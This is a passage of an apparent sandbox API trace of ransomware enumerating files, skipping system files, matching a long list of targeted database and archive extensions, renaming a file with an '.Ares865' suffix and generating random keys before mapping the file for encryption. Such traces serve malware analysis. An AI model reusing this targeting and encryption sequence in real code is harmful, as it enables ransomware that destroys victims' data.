(lpString1="..", lpString2=".") returned 1 [0085.914] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.914] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".") returned 1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="..") returned 1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="windows") returned -1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="bootmgr") returned 1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="temp") returned -1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="boot") returned 1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="ids.txt") returned -1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="perflogs") returned -1 [0085.914] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="MSBuild") returned -1 [0085.914] lstrlenW (lpString="ENVELOPR.DLL.trx_dll") returned 20 [0085.914] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*") returned 53 [0085.914] lstrcpyW (in: lpString1=0x2cce468, lpString2="ENVELOPR.DLL.trx_dll" | out: lpString1="ENVELOPR.DLL.trx_dll") returned="ENVELOPR.DLL.trx_dll" [0085.914] lstrlenW (lpString="ENVELOPR.DLL.trx_dll") returned 20 [0085.915] lstrlenW (lpString="Ares865") returned 7 [0085.915] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0085.915] lstrlenW (lpString=".dll") returned 4 [0085.915] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".dll") returned 1 [0085.915] lstrlenW (lpString=".lnk") returned 4 [0085.915] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".lnk") returned 1 [0085.915] lstrlenW (lpString=".ini") returned 4 [0085.915] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".ini") returned 1 [0085.915] lstrlenW (lpString=".sys") returned 4 [0085.915] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".sys") returned 1 [0085.915] lstrlenW (lpString="ENVELOPR.DLL.trx_dll") returned 20 [0085.915] lstrlenW (lpString="bak") returned 3 [0085.915] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0085.915] lstrlenW (lpString="ba_") returned 3 [0085.915] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0085.915] lstrlenW (lpString="dbb") returned 3 [0085.915] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0085.915] lstrlenW (lpString="vmdk") returned 4 [0085.915] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0085.915] lstrlenW (lpString="rar") returned 3 [0085.915] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0085.915] lstrlenW (lpString="zip") returned 3 [0085.915] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0085.915] lstrlenW (lpString="tgz") returned 3 [0085.915] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0085.915] lstrlenW (lpString="vbox") returned 4 [0085.915] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0085.915] lstrlenW (lpString="vdi") returned 3 [0085.915] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0085.915] lstrlenW (lpString="vhd") returned 3 [0085.915] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0085.915] lstrlenW (lpString="vhdx") returned 4 [0085.915] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0085.915] lstrlenW (lpString="avhd") returned 4 [0085.915] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0085.915] lstrlenW (lpString="db") returned 2 [0085.915] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0085.915] lstrlenW (lpString="db2") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0085.916] lstrlenW (lpString="db3") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0085.916] lstrlenW (lpString="dbf") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0085.916] lstrlenW (lpString="mdf") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0085.916] lstrlenW (lpString="mdb") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0085.916] lstrlenW (lpString="sql") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0085.916] lstrlenW (lpString="sqlite") returned 6 [0085.916] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0085.916] lstrlenW (lpString="sqlite3") returned 7 [0085.916] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0085.916] lstrlenW (lpString="sqlitedb") returned 8 [0085.916] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0085.916] lstrlenW (lpString="xml") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0085.916] lstrlenW (lpString="$er") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0085.916] lstrlenW (lpString="4dd") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0085.916] lstrlenW (lpString="4dl") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0085.916] lstrlenW (lpString="^^^") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0085.916] lstrlenW (lpString="abs") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0085.916] lstrlenW (lpString="abx") returned 3 [0085.916] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0085.916] lstrlenW (lpString="accdb") returned 5 [0085.916] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0085.916] lstrlenW (lpString="accdc") returned 5 [0085.916] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0085.916] lstrlenW (lpString="accde") returned 5 [0085.916] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0085.916] lstrlenW (lpString="accdr") returned 5 [0085.917] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0085.917] lstrlenW (lpString="accdt") returned 5 [0085.917] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0085.917] lstrlenW (lpString="accdw") returned 5 [0085.917] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0085.917] lstrlenW (lpString="accft") returned 5 [0085.917] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0085.917] lstrlenW (lpString="adb") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0085.917] lstrlenW (lpString="adb") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0085.917] lstrlenW (lpString="ade") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0085.917] lstrlenW (lpString="adf") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0085.917] lstrlenW (lpString="adn") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0085.917] lstrlenW (lpString="adp") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0085.917] lstrlenW (lpString="alf") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0085.917] lstrlenW (lpString="ask") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0085.917] lstrlenW (lpString="btr") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0085.917] lstrlenW (lpString="cat") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0085.917] lstrlenW (lpString="cdb") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0085.917] lstrlenW (lpString="ckp") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0085.917] lstrlenW (lpString="cma") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0085.917] lstrlenW (lpString="cpd") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0085.917] lstrlenW (lpString="dacpac") returned 6 [0085.917] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0085.917] lstrlenW (lpString="dad") returned 3 [0085.917] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0085.918] lstrlenW (lpString="dadiagrams") returned 10 [0085.918] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0085.918] lstrlenW (lpString="daschema") returned 8 [0085.918] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0085.918] lstrlenW (lpString="db-journal") returned 10 [0085.918] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0085.918] lstrlenW (lpString="db-shm") returned 6 [0085.918] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0085.918] lstrlenW (lpString="db-wal") returned 6 [0085.918] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0085.918] lstrlenW (lpString="dbc") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0085.918] lstrlenW (lpString="dbs") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0085.918] lstrlenW (lpString="dbt") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0085.918] lstrlenW (lpString="dbv") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0085.918] lstrlenW (lpString="dbx") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0085.918] lstrlenW (lpString="dcb") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0085.918] lstrlenW (lpString="dct") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0085.918] lstrlenW (lpString="dcx") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0085.918] lstrlenW (lpString="ddl") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0085.918] lstrlenW (lpString="dlis") returned 4 [0085.918] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0085.918] lstrlenW (lpString="dp1") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0085.918] lstrlenW (lpString="dqy") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0085.918] lstrlenW (lpString="dsk") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0085.918] lstrlenW (lpString="dsn") returned 3 [0085.918] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0085.919] lstrlenW (lpString="dtsx") returned 4 [0085.919] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0085.919] lstrlenW (lpString="dxl") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0085.919] lstrlenW (lpString="eco") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0085.919] lstrlenW (lpString="ecx") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0085.919] lstrlenW (lpString="edb") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0085.919] lstrlenW (lpString="epim") returned 4 [0085.919] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0085.919] lstrlenW (lpString="fcd") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0085.919] lstrlenW (lpString="fdb") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0085.919] lstrlenW (lpString="fic") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0085.919] lstrlenW (lpString="flexolibrary") returned 12 [0085.919] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0085.919] lstrlenW (lpString="fm5") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0085.919] lstrlenW (lpString="fmp") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0085.919] lstrlenW (lpString="fmp12") returned 5 [0085.919] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0085.919] lstrlenW (lpString="fmpsl") returned 5 [0085.919] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0085.919] lstrlenW (lpString="fol") returned 3 [0085.919] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0085.919] lstrlenW (lpString="fp3") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0085.920] lstrlenW (lpString="fp4") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0085.920] lstrlenW (lpString="fp5") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0085.920] lstrlenW (lpString="fp7") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0085.920] lstrlenW (lpString="fpt") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0085.920] lstrlenW (lpString="frm") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0085.920] lstrlenW (lpString="gdb") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0085.920] lstrlenW (lpString="gdb") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0085.920] lstrlenW (lpString="grdb") returned 4 [0085.920] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0085.920] lstrlenW (lpString="gwi") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0085.920] lstrlenW (lpString="hdb") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0085.920] lstrlenW (lpString="his") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0085.920] lstrlenW (lpString="ib") returned 2 [0085.920] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0085.920] lstrlenW (lpString="idb") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0085.920] lstrlenW (lpString="ihx") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0085.920] lstrlenW (lpString="itdb") returned 4 [0085.920] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0085.920] lstrlenW (lpString="itw") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0085.920] lstrlenW (lpString="jet") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0085.920] lstrlenW (lpString="jtx") returned 3 [0085.920] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0085.920] lstrlenW (lpString="kdb") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0085.921] lstrlenW (lpString="kexi") returned 4 [0085.921] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0085.921] lstrlenW (lpString="kexic") returned 5 [0085.921] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0085.921] lstrlenW (lpString="kexis") returned 5 [0085.921] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0085.921] lstrlenW (lpString="lgc") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0085.921] lstrlenW (lpString="lwx") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0085.921] lstrlenW (lpString="maf") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0085.921] lstrlenW (lpString="maq") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0085.921] lstrlenW (lpString="mar") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0085.921] lstrlenW (lpString="marshal") returned 7 [0085.921] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0085.921] lstrlenW (lpString="mas") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0085.921] lstrlenW (lpString="mav") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0085.921] lstrlenW (lpString="maw") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0085.921] lstrlenW (lpString="mdbhtml") returned 7 [0085.921] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0085.921] lstrlenW (lpString="mdn") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0085.921] lstrlenW (lpString="mdt") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0085.921] lstrlenW (lpString="mfd") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0085.921] lstrlenW (lpString="mpd") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0085.921] lstrlenW (lpString="mrg") returned 3 [0085.921] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0085.922] lstrlenW (lpString="mud") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0085.922] lstrlenW (lpString="mwb") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0085.922] lstrlenW (lpString="myd") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0085.922] lstrlenW (lpString="ndf") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0085.922] lstrlenW (lpString="nnt") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0085.922] lstrlenW (lpString="nrmlib") returned 6 [0085.922] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0085.922] lstrlenW (lpString="ns2") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0085.922] lstrlenW (lpString="ns3") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0085.922] lstrlenW (lpString="ns4") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0085.922] lstrlenW (lpString="nsf") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0085.922] lstrlenW (lpString="nv") returned 2 [0085.922] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0085.922] lstrlenW (lpString="nv2") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0085.922] lstrlenW (lpString="nwdb") returned 4 [0085.922] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0085.922] lstrlenW (lpString="nyf") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0085.922] lstrlenW (lpString="odb") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0085.922] lstrlenW (lpString="odb") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0085.922] lstrlenW (lpString="oqy") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0085.922] lstrlenW (lpString="ora") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0085.922] lstrlenW (lpString="orx") returned 3 [0085.922] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0085.923] lstrlenW (lpString="owc") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0085.923] lstrlenW (lpString="p96") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0085.923] lstrlenW (lpString="p97") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0085.923] lstrlenW (lpString="pan") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0085.923] lstrlenW (lpString="pdb") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0085.923] lstrlenW (lpString="pdm") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0085.923] lstrlenW (lpString="pnz") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0085.923] lstrlenW (lpString="qry") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0085.923] lstrlenW (lpString="qvd") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0085.923] lstrlenW (lpString="rbf") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0085.923] lstrlenW (lpString="rctd") returned 4 [0085.923] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0085.923] lstrlenW (lpString="rod") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0085.923] lstrlenW (lpString="rodx") returned 4 [0085.923] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0085.923] lstrlenW (lpString="rpd") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0085.923] lstrlenW (lpString="rsd") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0085.923] lstrlenW (lpString="sas7bdat") returned 8 [0085.923] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0085.923] lstrlenW (lpString="sbf") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0085.923] lstrlenW (lpString="scx") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0085.923] lstrlenW (lpString="sdb") returned 3 [0085.923] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0085.924] lstrlenW (lpString="sdc") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0085.924] lstrlenW (lpString="sdf") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0085.924] lstrlenW (lpString="sis") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0085.924] lstrlenW (lpString="spq") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0085.924] lstrlenW (lpString="te") returned 2 [0085.924] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0085.924] lstrlenW (lpString="teacher") returned 7 [0085.924] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0085.924] lstrlenW (lpString="tmd") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0085.924] lstrlenW (lpString="tps") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0085.924] lstrlenW (lpString="trc") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0085.924] lstrlenW (lpString="trc") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0085.924] lstrlenW (lpString="trm") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0085.924] lstrlenW (lpString="udb") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0085.924] lstrlenW (lpString="udl") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0085.924] lstrlenW (lpString="usr") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0085.924] lstrlenW (lpString="v12") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0085.924] lstrlenW (lpString="vis") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0085.924] lstrlenW (lpString="vpd") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0085.924] lstrlenW (lpString="vvv") returned 3 [0085.924] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0085.924] lstrlenW (lpString="wdb") returned 3 [0085.925] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0085.925] lstrlenW (lpString="wmdb") returned 4 [0085.925] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0085.925] lstrlenW (lpString="wrk") returned 3 [0085.925] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0085.925] lstrlenW (lpString="xdb") returned 3 [0085.925] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0085.925] lstrlenW (lpString="xld") returned 3 [0085.925] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0085.925] lstrlenW (lpString="xmlff") returned 5 [0085.925] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0085.925] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.Ares865") returned 80 [0085.925] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0085.927] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.928] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14176) returned 1 [0085.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.928] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.929] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.929] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.929] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a60, lpName=0x0) returned 0x15c [0085.931] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a60) returned 0x190000 [0085.932] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.933] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.933] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.933] RtlAllocateHeap 